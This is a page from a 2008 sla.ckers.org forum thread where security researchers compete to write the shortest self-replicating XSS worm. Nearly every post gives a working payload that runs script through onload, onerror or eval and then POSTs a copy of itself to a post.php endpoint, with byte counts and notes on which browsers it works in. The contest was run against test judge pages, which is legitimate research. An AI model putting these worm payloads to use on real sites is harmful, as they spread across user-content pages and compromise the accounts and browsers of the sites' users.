Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...7891011121314151617...LastNext
Current Page: 12 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 12:24PM

<x><script>alert('XSS');with(new XMLHttpRequest)open(x='post',x+'.php'),send('content='+document.body.parentNode.innerHTML.match(/<x>.*<\/x>/))</script></x>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 07, 2008 12:27PM

Ok Ronald, I can get you by two more (don't need the parens on the ending bold function). Works in FF2 and IE7.

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold)"></b>

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 12:33PM

@Matt

aha, does not work the above, it send the bold function instead of the payload if you leave out the ()

payload becomes:

function bold() {

    [native code]

}



Edited 3 time(s). Last edit at 01/07/2008 12:36PM by Ronald.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 12:34PM

@Ronald

Yeah really cool :D

Does innerHTML not add the closing iframe tag though?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 12:37PM

nope

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 07, 2008 12:47PM

I see all kind of statements of 'works on FF/IE', but I think you didn't test it on The unofficial judge... If you actually try to get it work, there are all kinds of problems that need to be solved that are interesting, they involve lots of hacks etc.

Anyway, some wide used optimization I was missing: with(){..;..} -> with()..,.. saving 2 bytes of both vectors, and they work and are tested on FF2/IE7/Opera9.5/Safari3.04:
<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),setRequestHeader('Content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>
254 bytes - XMLHttpRequest, image
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>
251 bytes - XMLHttpRequest, script

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 12:58PM

Just to be sure Gareth I close the iframe, this functions on Firebug like a charm and doesn't grow for sure:


<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></iframe></b>

So it becomes: 138Bytes

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:03PM

<b><img src='' onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

can also be a winner!



Edited 2 time(s). Last edit at 01/07/2008 02:04PM by Ronald.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 07, 2008 01:05PM

Ok looked at this one through WebScarab on the unofficial (177 bytes). Though does present doctype issues with ie7.

<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),send('content='+encodeURI('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:09PM

=.

becomes: '.' in firefox.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 07, 2008 01:22PM

Dunno what firefox you are using but here it just stays =. If it DOES change, try =/

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:29PM

Internally it changes it to ".", which also can be seen with firebug since it's invalid markup, so I guess it doesn't count because ultimately it grows in strict theory?

=/ doesn't work here.

I'd be happy to adjust my vector with it, it saves a byte but I dunno... I guess there is something to say for valid markup as well.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:36PM

But then again the first of this series:

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

which is a 130 bytes, does pass the judges without growing. Still, I'm not sure about the Iframe closing tag, so I posted a second. But, Firefox internally closes the markup but doesn't output it...

so are there votes for valid markup as well? sounds plausible if so.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 07, 2008 01:47PM

Live HTTP Headers give me this Ronald:

(post)content=<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())">&lt;/b&gt;</iframe></b>

Content-Length: 157

I guess we should start checking the actual content-length size instead of our output size. (Well, I was checking the output length anyway, not the content-length size).

I bet RSnake uses the content-length also.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:53PM

Hence, the question. Firebug gave the same, but still it doesn't output it in the page that follows. With a closing tag it's still 138, and suits fine for me. But I bet on the 135 byte img tag instead, sounds more safe :)

I have to work, have fun guys!

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 02:21PM

I don't wanna be ants in the picnic but on a Apache1.3.x/2.2.x with default settings the POST array is simply empty. Again the content-type issue...

Anyway - most of the examples can still be shortened by one byte:


<b><img/onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"/src=""></b>
134



<b><iframe/onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
129



Greetings,
.mario

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: beNi
Date: January 07, 2008 03:22PM

so now people are using my <b></b> .bold() solution. thx :)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 03:28PM

Not exactly but I am glad you are happy.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 07, 2008 03:33PM

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">

155

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 03:44PM

I should be ashamed.. I should be ashamed... I should be ashamed...

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"
154



:)



Edited 1 time(s). Last edit at 01/07/2008 03:44PM by .mario.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 07, 2008 03:45PM

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

154
thnks ma1!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 07, 2008 03:45PM

ahhhh 1 minute late!!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 03:46PM

Hehe how cool - like sniping on eBay ;)



Edited 1 time(s). Last edit at 01/07/2008 03:46PM by .mario.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: backStorm
Date: January 07, 2008 03:46PM

hi,

this is actually a conclusion of solutions around here but it is shorter and hopefully working. (tested only in firefox)

<b><i onload="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"/></b>

Length: 125

-backStorm

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 03:51PM

@backStorm: Onload for an <I> tag probably won't work. Check here for tag/event infos.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 07, 2008 04:04PM

@backStorm - you could do it like this, although there is an element of user interaction required. Also, you do not need to close the a tag so it saves you a byte to get 124 bytes.

<b><a onblur="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

@.mario - You are correct that his does not work in Firefox on either of the (unofficial) judge pages.



Edited 2 time(s). Last edit at 01/07/2008 04:11PM by Matt Presson.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 04:12PM

@mario: the iframe doesn't count since it grows.
(though it's still a debate)

131 then!

<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))"></b>

don't ask WHY but it seems to work.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 04:18PM

@Ronald: Plain wow - it even works on IE7!

I just saw in FF2 the request is made but not wrapped in the element 'content' - Firebug shows the request as such:

<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold
(alert('XSS')))" src=""></b>

should be:
content=<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML
.bold(alert('XSS')))" src=""></b>



Edited 1 time(s). Last edit at 01/07/2008 04:25PM by .mario.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 07, 2008 04:19PM

Same premise as Ronald's, but revised with backStorm's.

125 Bytes

<b><a onblur="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('xss')))"></b>



Edited 3 time(s). Last edit at 01/07/2008 04:32PM by Matt Presson.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 07, 2008 04:25PM

ronald:
it doesnt grow, it has a slice :D

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Pages: PreviousFirst...7891011121314151617...LastNext
Current Page: 12 of 20


Sorry, only registered users may post in this forum.